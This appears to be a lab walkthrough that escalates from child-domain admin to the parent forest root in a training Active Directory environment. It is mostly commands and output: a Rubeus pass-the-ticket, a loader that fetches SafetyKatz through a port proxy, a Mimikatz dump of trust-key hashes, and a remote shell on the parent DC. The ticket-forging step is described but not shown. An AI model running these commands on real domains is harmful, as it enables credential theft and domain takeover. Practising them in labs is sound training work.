Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.
To extract the trust key between dollarcorp and moneycorp, we need to start a process with DA privs, copy loader to dcorp-dc, and use it to extract credentials.
# Start a DA process
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# Copy Loader to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Open dcorp-dc shell
winrs -r:dcorp-dc cmd
# Setup port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
We can use SafetyKatz to extract credentials.
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::trust /patch" "exit"
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/11/2024 9:04:30 PM - CLEAR - 6c 5c 5a 6f 92 82 4f 17 79 cb de 1d a0 33 e0 38 e8 a9 53 09 41 00 a5 84 da e2 3a fa 16 a6 47 8c 16 ac 9d 55 56 f8 22 51 80 7a 97 42 6a 18 34 72 47 50 6b ed 98 9c 3c 61 6e 11 6f 68 21 05 a1 d3 a0 eb ab a3 31 69 ed 75 c0 3c 54 49 cc a3 9a ef 0d c9 aa b2 af b1 5a c9 e3 dc d6 58 6c 6d 6c 1f 07 c5 bb c1 a9 be 61 ed 53 e1 9c a1 b8 bd 65 4b 0a a4 34 e9 6d ae 0a e3 60 2f 52 c0 02 67 a0 c8 b6 88 16 20 a1 31 06 6f 49 26 fd 2c d0 48 c6 70 3e 7d 18 eb 19 e1 17 c2 3b 0f 6e 23 5c 12 09 ce 1a 1b 43 69 9c 3b c7 ab 82 16 24 be d9 58 0a b5 c3 cd 5f 18 c1 7c 0e 25 75 36 6d 8d 32 e0 ee 92 58 3d 7d a9 8a 1a 21 1a c5 58 cc 4a 68 c7 53 ff 39 70 e1 8d 2b e5 3f 1e 3d 62 2b 4a 39 17 14 19 e3 14 62 a5 f9 7d ec 18 6a be 0f d0 7c 58 c4 a0
* aes256_hmac bce498af44bfa1a1aacfe367a7e421aeac474d647e41cada56ba25855ae9966c
* aes128_hmac 2a2cd8447dea2f3a7ad2da6944a32f58
* rc4_hmac_nt 2aa6fd0eec0369f316217d65bb808e50
Copy the rc4 hash. We can use it to forge the inter-realm TGT and injecting SID History of Enterprise Admins
winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\student372>winrs -r:mcorp-dc.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator
C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC
C:\Users\Administrator.dcorp>